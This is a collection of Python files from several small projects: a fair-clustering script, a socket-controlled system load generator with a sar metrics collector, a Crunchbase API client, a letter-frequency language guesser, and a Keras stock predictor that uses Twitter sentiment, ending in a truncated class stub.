group_cost[curr_group] = group_cost[curr_group] + distances[i][curr_center]
group_cost[0] = group_cost[0]/count_g0 if count_g0 != 0 else math.inf
group_cost[1] = group_cost[1]/count_g1 if count_g1 != 0 else math.inf
# print(group_cost)
return max(group_cost[0],group_cost[1])
starting_centers = []
starting_centers.append(random.randint(0,n-1))
starting_centers.append(random.randint(0,n-2))
if starting_centers[1] > starting_centers[0] - 1:
starting_centers[1] += 1
print(starting_centers)
chosen_centers = starting_centers
centers = starting_centers
print(centers)
chosen_assignment = [0]*n
assignment = [0]*n
for i in range(n):
minn = math.inf
for j in range(k):
curr_center = centers[j]
curr_distance = distances[i][curr_center]
if (curr_distance < minn):
minn = curr_distance
assignment[i] = j
chosen_assignment = assignment
print(assignment)
min_cost = cost_function()
print(min_cost)
# OLD METHOD FOR ITERATING OVER CENTERS # not using anymore -- deprecated
# alfa = 1
# while alfa<len(comb):
# centers = comb[alfa]
# for i in range(n):
# minn = math.inf
# for j in range(k):
# curr_center = centers[j]
# curr_distance = distances[i][curr_center]
# if (curr_distance < minn):
# minn = curr_distance
# assignment[i] = j
# curr_cost = cost_function()
# min_cost = curr_cost if curr_cost<min_cost else min_cost
# chosen_centers = comb[alfa] if curr_cost<min_cost else chosen_centers
# chosen_assignment = assignment if curr_cost<min_cost else chosen_assignment
# if alfa%200 ==0:
# print("alfa: ",alfa)
# print("cost: ", min_cost)
# print("centers: ", comb[alfa])
# alfa+=1
# print("FINAL:")
# print(min_cost, chosen_centers)
# print(chosen_assignment)
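# Local search: starting from the random centers, repeatedly try swapping either center
# with every other point (visited in random order); keep a swap whenever it lowers the
# fairness cost, and stop once a full pass yields no improvement.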
flag = 0
alpha = 0
while (flag != 1):
alpha += 1
if alpha%10 == 0:
print(alpha)
flag = 1
# Check if any other point is a better center
r = list(range(n))
random.shuffle(r)
for c in r:
centers = list(chosen_centers)
# Try replacing first center
if (c != centers[0] and c != centers[1]):
# set new center
centers[0] = c
# do new assignment
for i in range(n):
minn = math.inf
for j in range(k):
curr_center = centers[j]
curr_distance = distances[i][curr_center]
if (curr_distance < minn):
minn = curr_distance
assignment[i] = j
# calculate new cost
curr_cost = cost_function()
# change variables if new cost is better
if curr_cost<min_cost:
min_cost = curr_cost
chosen_centers = centers
chosen_assignment = assignment
flag = 0
break
centers = list(chosen_centers)
# Try replacing second center
if (c != centers[1] and c != centers[0]):
# set new center
centers[1] = c
# do new assignment
for i in range(n):
minn = math.inf
for j in range(k):
curr_center = centers[j]
curr_distance = distances[i][curr_center]
if (curr_distance < minn):
minn = curr_distance
assignment[i] = j
# calculate new cost
curr_cost = cost_function()
# change variables if new cost is better
if curr_cost<min_cost:
min_cost = curr_cost
chosen_centers = centers
chosen_assignment = assignment
flag = 0
break
print("FINAL:")
print(min_cost, chosen_centers)
print(chosen_assignment)
end = time.time()
print("Time taken: ", end-start)
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for i in range(n):
xs = data[i][0]
ys = data[i][1]
zs = data[i][2]
if chosen_centers[0] == i or chosen_centers[1] == i:
c = 'red'
else:
if chosen_assignment[i] == 0:
if data_group[i] == 0:
c = 'navy'
else:
c = 'violet'
else:
if data_group[i] == 0:
c = 'yellow'
else:
c = 'lime'
ax.scatter(xs, ys, zs, c=c, marker='o')
ax.set_xlabel('Normalized Age')
ax.set_ylabel('Normalized Balance')
ax.set_zlabel('Normalized Duration')
ax.set_title('Best Cluster')
plt.show()
``` |
{
"source": "2018SEUer/LoadSimulator-Measuring",
"score": 2
} |
#### File: LoadSimulator-Measuring/Master Program/loadRunner.py
```python
from concurrent.futures import ThreadPoolExecutor
import subprocess, re, time
import os,sys,math,threading
import socket
# Global variable setup and initialization (the core count and maximum frequency must be set manually)
global cores_num
global freq_max
cores_num = 12 # number of CPU cores
freq_max = 2100 # maximum CPU frequency
level = [0,0,0,0,0,0,0,0,0,0,0] # load levels for each component
tslp = 10000 # sleep time
t = 100000 # time
network = '192.168.0.1' # used for network load generation
TCPwindow = 10 # used for network load generation
'''
CPU
'''
# Map each 10% step to a corresponding frequency level
def freq_calculator():
freq_av=int(freq_max/10)
level[1]=freq_av
for n in range (2,11):
level[n]=level[n-1]+freq_av
# Get the number of currently enabled CPU cores
def cores_on_num():
grep_info=subprocess.Popen('''grep "processor" /proc/cpuinfo''', shell=True, stdout=subprocess.PIPE)
out0, err0=grep_info.communicate()
grep_str=out0.decode(encoding='utf-8', errors='ignore')
cores_on_num=len(re.findall('processor', grep_str))
return cores_on_num
# FUNC 1: enable n cores; the argument is the number of cores to bring online
def cores_on(n):
global cores_num
if int(n)>cores_num or int(n)==0:
raise Exception("wrong")
num=cores_on_num()
if int(n)>num:
for i in range(int(n)-num):
subprocess.call("echo '1' > /sys/devices/system/cpu/cpu%s/online"%str(num+i), shell=True)
if int(n)<num:
for i in range(num-int(n)):
subprocess.call("echo '0' > /sys/devices/system/cpu/cpu%s/online"%str(num-i-1), shell=True)
# FUNC 2: limit the frequency of all enabled cores to the target frequency
def freq_set(f):
subprocess.call('cpupower frequency-set -f %s'%str(f), shell=True)
# FUNC 3: apply load to the currently enabled cores; the argument is the load percentage
def stress(s,t,tslp):
lookbusy_p=subprocess.Popen('lookbusy -c %s --quiet'%(str(s)), shell=True)
time.sleep(t)
    # kill the lookbusy load process
subprocess.call('pkill -9 lookbusy', shell=True)
time.sleep(tslp)
'''
disk
'''
def diskstress(e,t,tslp):
    # Ten levels of disk I/O load: each level loops an iozone workload with a larger file size until time t elapses
var=0
T0=time.time()
if e==0:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 4K -I')
if e==1:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 128K -I')
if e==2:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 640K -I')
if e==3:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 2048K -I')
if e==4:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 4608K -I')
if e==5:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 8M -I')
if e==6:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 10M -I')
if e==7:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 32M -I')
if e==8:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 128M -I')
if e==9:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 512M -I')
if e==10:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 1024M -I')
print('disk success!')
time.sleep(tslp)
'''
memory
'''
def memorystress(z,t,tslp):
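    # Parse `sar -r` to find the current memory usage, then launch `stress --vm` to
    # allocate roughly enough memory to raise usage to the requested level (z*10+30 percent).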
sar_r_info=subprocess.Popen('sar -r ALL 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_r_info.communicate()
sar_r_str=out0.decode(encoding='utf-8', errors='ignore')
lines_r=len(sar_r_str.split('\n'))
sar_r_str=sar_r_str.split('\n')
for i in range(0,lines_r-1):
count_r=len(sar_r_str[i].split())
sar_r_str[i]=sar_r_str[i].split()
if count_r==17:
for j in range(0,count_r):
try:
sar_r_str[i][j]=float(sar_r_str[i][j])
except ValueError:
sar_r_str[i][j]=sar_r_str[i][j]
if sar_r_str[i][1]!='kbmemfree':
m=int(z)*10+30-sar_r_str[i][4];
m=int(m*(sar_r_str[i][1]+sar_r_str[i][2])/100)
str_m='stress --vm 1 --vm-bytes '+str(m)+'K --vm-hang 100 --timeout '+str(t)+'s'
stress_r_info=subprocess.Popen(str_m, shell=True, stdout=subprocess.PIPE)
time.sleep(int(tslp))
'''
network
'''
def networkstress(network,TCPwindow,j,t,tslp):
TCPwindow=int(TCPwindow)*float(j)
TCPwindow=str(TCPwindow)+'M'
str_sys='iperf3 -c %s -b %s -d m -t '+str(t)
# TCP模式加压
os.system(str_sys%(network,TCPwindow))
time.sleep(tslp)
#---------------------------------#
#           main function            #
#---------------------------------#
if __name__ == "__main__":
    #----------- update global variables -----------
    # Assign the current number of CPU cores to the global variable cores_num
cores_num=cores_on_num()
    # Set the maximum frequency of the CPU cores
freq_max=800000000
freq_calculator()
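    # The thread pool lets the CPU, memory, disk and network stressors run concurrently.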
pool=ThreadPoolExecutor(max_workers=6)
    #----------- socket communication -----------
    # Create a TCP/IP socket
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("-------------")
print(clientSocket)
print("-------------")
    # Server IP address (must be set manually)
IP1 = "192.168.10.101"
host = IP1
    # Port number (must be set manually)
port = 8008
buffer_size = 1024
address = (host, port)
print("-------------")
print(address)
print("-------------")
clientSocket.connect(address)
print("等待服务端发送信息:")
while(True):
data = clientSocket.recv(1024)
data = data.decode("utf-8")
print(data)
if data=="连接服务器成功":
print(data)
elif data=='STOP':
pool.shutdown(wait=True)
else :
x=data.split()
results = list(map(int, x))
cores_on(results[0])
freq_set(level[int(results[1]/10)])
pool.submit(stress,results[2],t,tslp)
pool.submit(memorystress,results[3],t,tslp)
            pool.submit(diskstress,results[4],t,tslp)
pool.submit(networkstress,network,TCPwindow,results[5],t,tslp)
# __END__OF__LOADRUNNER_PY__
```
#### File: LoadSimulator-Measuring/Master Program/sar.py
```python
import socket, time, subprocess, sys, os, math, time, sqlite3
# Get the current timestamp
def sar_collect():
    year, month, day, hour, minute, second = getDate()
    datetime=year+'-'+month+'-'+day+' '+hour+':'+minute+':'+second
    timestamp=int(time.mktime(time.strptime(datetime, '%Y-%m-%d %H:%M:%S')))
    return timestamp
'''
date&time
'''
# Get the current date
def getDate():
year=time.strftime('%Y')
month=time.strftime('%m')
day=time.strftime('%d')
hour=time.strftime('%H')
minute=time.strftime('%M')
second=time.strftime('%S')
print('打印当前日期:',year,month,day,hour,minute,second)
return year,month,day,hour,minute,second
# Convert a formatted date-time string into a Unix timestamp
def dt_stamp(year, month, day, hour, minute, second):
datetime=year+'-'+month+'-'+day+' '+hour+':'+minute+':'+second
timestamp=int(time.mktime(time.strptime(datetime, '%Y-%m-%d %H:%M:%S')))
return timestamp
'''
CPU
'''
# Collect CPU utilization data
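# Each gather_* helper below follows the same pattern: run one sar command, split the
# output into whitespace-separated fields, convert numeric fields to float, keep only
# the summary row of interest, and append the selected columns to a space-separated string.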
def gather_cpu():
sar_gather=''
sar_cpu_info=subprocess.Popen('sar -u ALL -P ALL 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_cpu_info.communicate()
sar_cpu_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_cpu_str.split('\n'))
sar_cpu_str=sar_cpu_str.split('\n')
for i in range(0,lines):
count_r=len(sar_cpu_str[i].split())
sar_cpu_str[i]=sar_cpu_str[i].split()
if count_r==12:
for j in range(0,count_r):
try:
sar_cpu_str[i][j]=float(sar_cpu_str[i][j])
except ValueError:
sar_cpu_str[i][j]=sar_cpu_str[i][j]
if sar_cpu_str[i][1]=="all":
if j>=2:
sar_gather+=str(sar_cpu_str[i][j])
sar_gather+=' '
return sar_gather
# Collect the CPU clock frequency
def gather_cpuMHz():
sar_gather=''
sar_cpu_info=subprocess.Popen('sar -m CPU -P ALL 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_cpu_info.communicate()
sar_cpu_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_cpu_str.split('\n'))
sar_cpu_str=sar_cpu_str.split('\n')
for i in range(0,lines):
count_r=len(sar_cpu_str[i].split())
sar_cpu_str[i]=sar_cpu_str[i].split()
if count_r==3:
for j in range(0,count_r):
try:
sar_cpu_str[i][j]=float(sar_cpu_str[i][j])
except ValueError:
sar_cpu_str[i][j]=sar_cpu_str[i][j]
if sar_cpu_str[i][1]=="all":
if j>=2:
sar_gather+=str(sar_cpu_str[i][j])
sar_gather+=' '
return sar_gather
'''
memory
'''
# Collect memory usage data
def gather_memory():
sar_gather=''
sar_mem_info=subprocess.Popen('sar -r ALL 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_mem_info.communicate()
sar_mem_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_mem_str.split('\n'))
sar_mem_str=sar_mem_str.split('\n')
for i in range(0,lines):
count_r=len(sar_mem_str[i].split())
sar_mem_str[i]=sar_mem_str[i].split()
if count_r==16:
for j in range(0,count_r):
try:
sar_mem_str[i][j]=float(sar_mem_str[i][j])
except ValueError:
sar_mem_str[i][j]=sar_mem_str[i][j]
if sar_mem_str[i][1]!="kbmemfree":
if j>=3 and j!=4 and j!=5 and j!=6 and j!=12 :
sar_gather+=str(sar_mem_str[i][j])
sar_gather+=' '
sar_mem_info=subprocess.Popen('sar -B 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_mem_info.communicate()
sar_mem_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_mem_str.split('\n'))
sar_mem_str=sar_mem_str.split('\n')
for i in range(0,lines):
count_r=len(sar_mem_str[i].split())
sar_mem_str[i]=sar_mem_str[i].split()
if count_r==10:
for j in range(0,count_r):
try:
sar_mem_str[i][j]=float(sar_mem_str[i][j])
except ValueError:
sar_mem_str[i][j]=sar_mem_str[i][j]
if sar_mem_str[i][1]!="pgpgin/s":
if j>=1 and j!=7:
sar_gather+=str(sar_mem_str[i][j])
sar_gather+=' '
return sar_gather
'''
disk
'''
# Collect disk activity data
def gather_disk():
sar_gather=''
sar_disk_info=subprocess.Popen('sar -d 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_disk_info.communicate()
sar_disk_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_disk_str.split('\n'))
sar_disk_str=sar_disk_str.split('\n')
for i in range(0,lines):
count_r=len(sar_disk_str[i].split())
sar_disk_str[i]=sar_disk_str[i].split()
if count_r==10:
for j in range(0,count_r):
try:
sar_disk_str[i][j]=float(sar_disk_str[i][j])
except ValueError:
sar_disk_str[i][j]=sar_disk_str[i][j]
if sar_disk_str[i][1]=="dev8-0":
if j>=2:
sar_gather+=str(sar_disk_str[i][j])
sar_gather+=' '
return sar_gather
'''
network
'''
# Collect network interface data
def gather_network():
sar_gather=''
sar_net_info=subprocess.Popen('sar -n DEV 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_net_info.communicate()
sar_net_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_net_str.split('\n'))
sar_net_str=sar_net_str.split('\n')
for i in range(0,lines):
count_r=len(sar_net_str[i].split())
sar_net_str[i]=sar_net_str[i].split()
if count_r==10:
for j in range(0,count_r):
try:
sar_net_str[i][j]=float(sar_net_str[i][j])
except ValueError:
sar_net_str[i][j]=sar_net_str[i][j]
if sar_net_str[i][1]=="wlp3s0":
if j>=2:
sar_gather+=str(sar_net_str[i][j])
sar_gather+=' '
sar_net_info=subprocess.Popen('sar -n EDEV 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_net_info.communicate()
sar_net_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_net_str.split('\n'))
sar_net_str=sar_net_str.split('\n')
for i in range(0,lines):
count_r=len(sar_net_str[i].split())
sar_net_str[i]=sar_net_str[i].split()
if count_r==11:
for j in range(0,count_r):
try:
sar_net_str[i][j]=float(sar_net_str[i][j])
except ValueError:
sar_net_str[i][j]=sar_net_str[i][j]
if sar_net_str[i][1]=="wlp3s0":
if j>=2:
sar_gather+=str(sar_net_str[i][j])
sar_gather+=' '
return sar_gather
'''
task
'''
# Collect run-queue and load-average data
def gather_q():
sar_gather=''
sar_task_info=subprocess.Popen('sar -q 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_task_info.communicate()
sar_task_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_task_str.split('\n'))
sar_task_str=sar_task_str.split('\n')
for i in range(0,lines):
count_r=len(sar_task_str[i].split())
sar_task_str[i]=sar_task_str[i].split()
if count_r==7:
for j in range(0,count_r):
try:
sar_task_str[i][j]=float(sar_task_str[i][j])
except ValueError:
sar_task_str[i][j]=sar_task_str[i][j]
if sar_task_str[i][1]!="runq-sz" and sar_task_str[i][0]!="Linux":
if j>=1:
sar_gather+=str(sar_task_str[i][j])
sar_gather+=' '
return sar_gather
'''
interrupt
'''
# Collect interrupt data
def gather_I():
sar_gather=''
sar_intr_info=subprocess.Popen('sar -I 1 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_intr_info.communicate()
sar_intr_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_intr_str.split('\n'))
sar_intr_str=sar_intr_str.split('\n')
for i in range(0,lines):
count_r=len(sar_intr_str[i].split())
sar_intr_str[i]=sar_intr_str[i].split()
if count_r==3:
for j in range(0,count_r):
try:
sar_intr_str[i][j]=float(sar_intr_str[i][j])
except ValueError:
sar_intr_str[i][j]=sar_intr_str[i][j]
if sar_intr_str[i][1]!="INTR":
if j==2:
sar_gather+=str(sar_intr_str[i][j])
sar_gather+=' '
return sar_gather
'''
process
'''
# Collect process creation and context-switch data
def gather_w():
sar_gather=''
sar_prcs_info=subprocess.Popen('sar -w 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_prcs_info.communicate()
sar_prcs_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_prcs_str.split('\n'))
sar_prcs_str=sar_prcs_str.split('\n')
for i in range(0,lines):
count_r=len(sar_prcs_str[i].split())
sar_prcs_str[i]=sar_prcs_str[i].split()
if count_r==3:
for j in range(0,count_r):
try:
sar_prcs_str[i][j]=float(sar_prcs_str[i][j])
except ValueError:
sar_prcs_str[i][j]=sar_prcs_str[i][j]
if sar_prcs_str[i][1]!="proc/s":
if j>=1:
sar_gather+=str(sar_prcs_str[i][j])
sar_gather+=' '
return sar_gather
'''
io
'''
# Collect overall I/O transfer statistics
def gather_b():
sar_gather=''
sar_io_info=subprocess.Popen('sar -b 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_io_info.communicate()
sar_io_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_io_str.split('\n'))
sar_io_str=sar_io_str.split('\n')
for i in range(0,lines):
count_r=len(sar_io_str[i].split())
sar_io_str[i]=sar_io_str[i].split()
if count_r==6:
for j in range(0,count_r):
try:
sar_io_str[i][j]=float(sar_io_str[i][j])
except ValueError:
sar_io_str[i][j]=sar_io_str[i][j]
if sar_io_str[i][1]!="tps":
if j>=1:
sar_gather+=str(sar_io_str[i][j])
sar_gather+=' '
return sar_gather
'''
swap
'''
# Collect swap paging activity data
def gather_W():
sar_gather=''
sar_swap_info=subprocess.Popen('sar -W 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_swap_info.communicate()
sar_swap_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_swap_str.split('\n'))
sar_swap_str=sar_swap_str.split('\n')
for i in range(0,lines):
count_r=len(sar_swap_str[i].split())
sar_swap_str[i]=sar_swap_str[i].split()
if count_r==3:
for j in range(0,count_r):
try:
sar_swap_str[i][j]=float(sar_swap_str[i][j])
except ValueError:
sar_swap_str[i][j]=sar_swap_str[i][j]
if sar_swap_str[i][1]!="pswpin/s":
if j>=1:
sar_gather+=str(sar_swap_str[i][j])
sar_gather+=' '
return sar_gather
'''
swap
'''
# Collect swap space usage data
def gather_S():
sar_gather=''
sar_swap_info=subprocess.Popen('sar -S 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_swap_info.communicate()
sar_swap_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_swap_str.split('\n'))
sar_swap_str=sar_swap_str.split('\n')
for i in range(0,lines):
count_r=len(sar_swap_str[i].split())
sar_swap_str[i]=sar_swap_str[i].split()
if count_r==6:
for j in range(0,count_r):
try:
sar_swap_str[i][j]=float(sar_swap_str[i][j])
except ValueError:
sar_swap_str[i][j]=sar_swap_str[i][j]
if sar_swap_str[i][1]!="kbswpfree":
if j>=3 and j!=4:
sar_gather+=str(sar_swap_str[i][j])
sar_gather+=' '
return sar_gather
'''
data aggregation
'''
def gather():
year,month,day,hour,minute,second=getDate()
    # Build the timestamp
timestamp=dt_stamp(year, month, day, hour, minute, second)
sar_gather=''
# sar_gather[1~10]: %usr %nice %sys %iowait %steal %irq %soft %guest %gnice %idle
sar_gather+=gather_cpu()
# sar_gather[11]: MHz
sar_gather+=gather_cpuMHz()
    # sar_gather[12-20]:%memused %commit kbactive kbinact kbdirty kbanonpg kbstack kbpgtbl kbvmused
# sar_gather[21-28]:pgpgin/s pgpgout/s fault/s majflt/s pgfree/s pgscank/s pgsteal/s %vmeff
sar_gather+=gather_memory()
# sar_gather[29-36]:tps rd_sec/s wr_sec/s avgrq-sz avgqu-sz await svctm %util
sar_gather+=gather_disk()
# sar_gather[37-53]:rxpck/s txpck/s rxkB/s txkB/s rxcmp/s txcmp/s rxmcst/s %ifutil rxerr/s txerr/s coll/s rxdrop/s txdrop/s txcarr/s rxfram/s rxfifo/s txfifo/s
sar_gather+=gather_network()
# sar_gather[54-59]: runq-sz plist-sz ldavg-1 ldavg-5 ldavg-15 blocked
sar_gather+=gather_q()
# sar_gather[60]:intr/s
sar_gather+=gather_I()
# sar_gather[61-62]:proc/s cswch/s
sar_gather+=gather_w()
# sar_gather[63-67]: tps rtps wtps bread/s bwrtn/s
sar_gather+=gather_b()
# sar_gather[68-69]:pswpin/s pswpout/s
sar_gather+=gather_W()
# sar_gather[70-71]: %swpused %swpcad
sar_gather+=gather_S()
    # Prepend the timestamp to the sar_gather output string
sar_gather=str(timestamp)+' '+sar_gather
return sar_gather
#---------------------------------#
#           main function            #
#---------------------------------#
if __name__ =="__main__":
    #---------- socket communication ----------
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(clientSocket)
    # Server IP address, port number, etc. (must be set manually)
host = socket.gethostname()
IP = "192.168.10.101"
host = IP
port = 8080
buffer_size = 1024
address = (host, port)
print(address)
clientSocket.connect(address)
print("连接服务器成功")
print("等待服务端发送信息...")
    # Communicate with the server
while(1):
infor = clientSocket.recv(1024)
command=infor.decode("utf-8")
print("从服务器接受到消息",command)
print("开始输出sar 的cpu、memory、disk、network等信息")
if command=="COLLECT":
data=gather()
            # Send the collected metrics as a single ordered string
information=data
clientSocket.send(information.encode("utf-8"))
    # Close the socket connection
clientSocket.close()
# __END__OF__SAR_PY__
``` |
{
"source": "2018sjain/crunchbase-investments",
"score": 3
} |
#### File: 2018sjain/crunchbase-investments/company.py
```python
import requests
import json
from person import Person
class Company:
global user_key
user_key = '' #input crunchbase API key
def __init__(self, name, permalink, fund):
self.name = name
self.permalink = permalink
self.fund = fund
self.categories, self.location = self.self_populate()
self.type = "COMPANY"
self.team = self.gen_team()
def get_name(self):
return self.name
def set_name(self, name):
self.name = name
def get_permalink(self):
return self.permalink
def set_permalink(self, permalink):
self.permalink = permalink
def get_fund(self):
return self.fund
def set_fund(self, fund):
self.fund = fund
def get_categories(self):
return self.categories
def set_categories(self, categories):
self.categories = categories
def get_location(self):
return self.location
def set_location(self, location):
self.location = location
def get_type(self):
return self.type
def set_type(self, types):
self.type = types
def get_team(self):
return self.team
def set_team(self, team):
self.team = team
def self_populate(self):
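        # Fetch the organization's headquarters region and category names from the
        # Crunchbase v3 API; a missing headquarters entry simply leaves the location empty.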
location = ""
data_loc = requests.get("https://api.crunchbase.com/v3/organizations/" + self.permalink + "/headquarters?user_key=" + user_key).json()
try:
location = data_loc['data']['items'][0]['properties']['region']
except IndexError as e:
pass
data_cat = requests.get("https://api.crunchbase.com/v3/organizations/" + self.permalink + "/categories?user_key=" + user_key).json()
categories = []
temp_cat = data_cat['data']['items']
for item in temp_cat:
categories.append(item['properties']['name'])
return categories, location
def gen_team(self):
data_team = requests.get("https://api.crunchbase.com/v3/organizations/" + self.permalink + "/current_team?user_key=" + user_key).json()
team = []
temp_team = data_team['data']['items']
for item in temp_team:
permalink = item['relationships']['person']['properties']['permalink']
team.append(Person(permalink, self))
return team
``` |
{
"source": "2018sjain/pylingual",
"score": 3
} |
#### File: pylingual/assets/predict.py
```python
import numpy as np
import string
import re
# pulling respective letter data from 'data' folder
en = [np.load('data/english_one.npy'),
np.load('data/english_two.npy'),
np.load('data/english_three.npy'),
'english']
es = [np.load('data/spanish_one.npy'),
np.load('data/spanish_two.npy'),
np.load('data/spanish_three.npy'),
'spanish']
fr = [np.load('data/french_one.npy'),
np.load('data/french_two.npy'),
np.load('data/french_three.npy'),
'french']
de = [np.load('data/german_one.npy'),
np.load('data/german_two.npy'),
np.load('data/german_three.npy'),
'german']
# converts input to letter characters
def clean(word):
    return re.sub(r'[^a-zA-Z\n.]', ' ', word.translate(str.maketrans('','',string.punctuation)))
# converts character to corresponding number
def num(letter):
letter = letter.lower()
if letter == ' ': return 0
return ord(letter) - 96
# converts array of values to percentages of each value
def percents(vals):
total = sum(vals)
if total == 0: total = 1
percents = [round((var/total)*100, 2) for var in vals]
return percents
# pulls letter data from previous datasets
def one_chance(letter, lang):
return lang[0][num(letter)]
def two_chance(letter_a, letter_b, lang):
return lang[1][num(letter_a)][num(letter_b)]
def three_chance(letter_a, letter_b, letter_c, lang):
return lang[2][num(letter_a)][num(letter_b)][num(letter_c)]
# calculates the structural similarity of inputted word to each respective language letter structure
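# The score multiplies single-letter, letter-pair, and letter-triple frequencies of the
# input under each language's tables, then combines the three products with weights a, b, c.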
def calculate(user_input, lang, a, b, c):
one_prob = 1
two_prob = 1
three_prob = 1
for letter in user_input:
one_prob *= one_chance(letter, lang)
for letter in range(len(user_input)-1):
two_prob *= two_chance(user_input[letter], user_input[letter+1], lang)
for letter in range(len(user_input)-2):
three_prob *= three_chance(user_input[letter], user_input[letter+1], user_input[letter+2], lang)
return (a*one_prob) + (b*two_prob) + (c*three_prob)
# current user input and processing
user_input = 'I went to the library.'
user_input = clean(user_input.lower())
print('input: ' + user_input + '\n\n' + 'results:' )
results = []
languages = [en, es, fr, de]
for lang in languages:
# optimal weights: 2, 12, 4
prob = calculate(user_input, lang, 2, 12, 4)
results.append((prob, lang[3]))
sort = sorted(results, reverse = True, key=lambda tup: tup[0])
percents = percents([val[0] for val in sort])
for x in range (len(sort)):
print(sort[x][1] + ": " + str(percents[x]) + '%')
``` |
{
"source": "2018sjain/stock-predictions",
"score": 3
} |
#### File: 2018sjain/stock-predictions/stock-predict.py
```python
import requests
import sys
import numpy as np
import tweepy
import os
from keras.models import Sequential
from keras.layers import Dense
from textblob import TextBlob
consumer_key = ""
comsumer_secret = ""
access_token = ""
access_secret = ""
login = tweepy.OAuthHandler(consumer_key, comsumer_secret)
login.set_access_token(access_token, access_secret)
user = tweepy.API(login)
file = 'historical.csv'
def get_name(symbol):
url = "http://d.yimg.com/autoc.finance.yahoo.com/autoc?query={}®ion=1&lang=en".format(symbol)
result = requests.get(url).json()
for x in result['ResultSet']['Result']:
if x['symbol'] == symbol:
return x['name']
def sentiment(quote, num):
tweet_list = user.search(get_name(quote), count = num)
positive = 0
null = 0
for tweet in tweet_list:
check = TextBlob(tweet.text).sentiment
if check.subjectivity == 0:
null += 1
            continue
if check.polarity > 0:
positive += 1
if positive > ((num - null)/2):
return True
def get_data(quote):
url = 'http://www.google.com/finance/historical?q=NASDAQ%3A'+quote+'&output=csv'
r = requests.get(url, stream = True)
if r.status_code != 400:
with open(file, 'wb') as fl:
for line in r:
fl.write(line)
return True
def predict():
data = []
with open(file) as f:
for num, line in enumerate(f):
if num != 0:
data.append(float(line.split(',')[1]))
data = np.array(data)
def create_set(data):
datax = [data[n+1] for n in range(len(data)-2)]
return np.array(datax), data[2:]
trainx, trainy = create_set(data)
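    # A small dense network (8 ReLU units feeding one linear output) is fit to map each
    # closing price in the series to the adjacent closing price; the most recent close is
    # then fed back in to produce the prediction returned below.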
classifier = Sequential()
classifier.add(Dense(8, input_dim = 1, activation = 'relu'))
classifier.add(Dense(1))
classifier.compile(loss = 'mean_squared_error', optimizer = 'adam')
    classifier.fit(trainx, trainy, epochs = 200, batch_size = 2, verbose = 2)
prediction = classifier.predict(np.array([data[0]]))
return 'from %s to %s' % (data[0], prediction[0][0])
quote = input('Enter stock quote: ').upper()
if not get_data(quote):
print ('ERROR, please re-run the script')
print(predict())
if not sentiment(quote, num = 100):
print ('This stock has bad sentiment')
else:
print ('This stock has good sentiment')
os.remove(file)
``` |
{
"source": "201901407/woc3.0-eventmanager-DarshilParikh",
"score": 2
} |
#### File: EventManager/Home/models.py
```python
from django.db import models
import uuid, datetime
from django.utils import timezone
# Create your models here.
class User(models.Model):
user_id = models.CharField(max_length=100,default=uuid.uuid4)
email = models.EmailField(max_length=100)
name = models.CharField(max_length=100)
password = models.CharField(max_length=250)
def getUserDetails(self):
return self.email
class Event(models.Model):
event_id = models.CharField(max_length=100,default=uuid.uuid4)
event_name = models.CharField(max_length = 120)
event_start = models.DateTimeField()
event_end = models.DateTimeField()
host_email = models.EmailField(max_length = 100)
host_name = models.CharField(max_length = 100)
event_description = models.CharField(max_length = 300)
registration_deadline = models.DateTimeField(default=timezone.now)
event_poster = models.URLField(max_length=150,default = '')
def getEventDetails(self):
return [self.event_name,self.event_start,self.event_end,self.host,self.event_description]
class Participant(models.Model):
pevent_id = models.CharField(max_length=100)
participant_email = models.EmailField(max_length = 100)
participant_name = models.CharField(max_length=100)
participant_contactno = models.IntegerField()
group_registration = models.BooleanField()
no_of_members = models.IntegerField()
``` |
{
"source": "2019-20-TFG-Presencial-Febr/PruebaNetExtractor",
"score": 3
} |
#### File: src/Guiones/CrearDiccionario.py
```python
import urllib
from bs4 import BeautifulSoup
class CrearDiccionario:
"""
    Class that builds a character dictionary automatically
    Args:
        modusuario: instance of the model class
"""
def __init__(self, modusuario):
self.mod = modusuario
def obtenerPersPelicula(self, url):
"""
        Method that builds a character dictionary for a script from a URL entered by the user
        Args:
            url: string containing the entered URL
        Return:
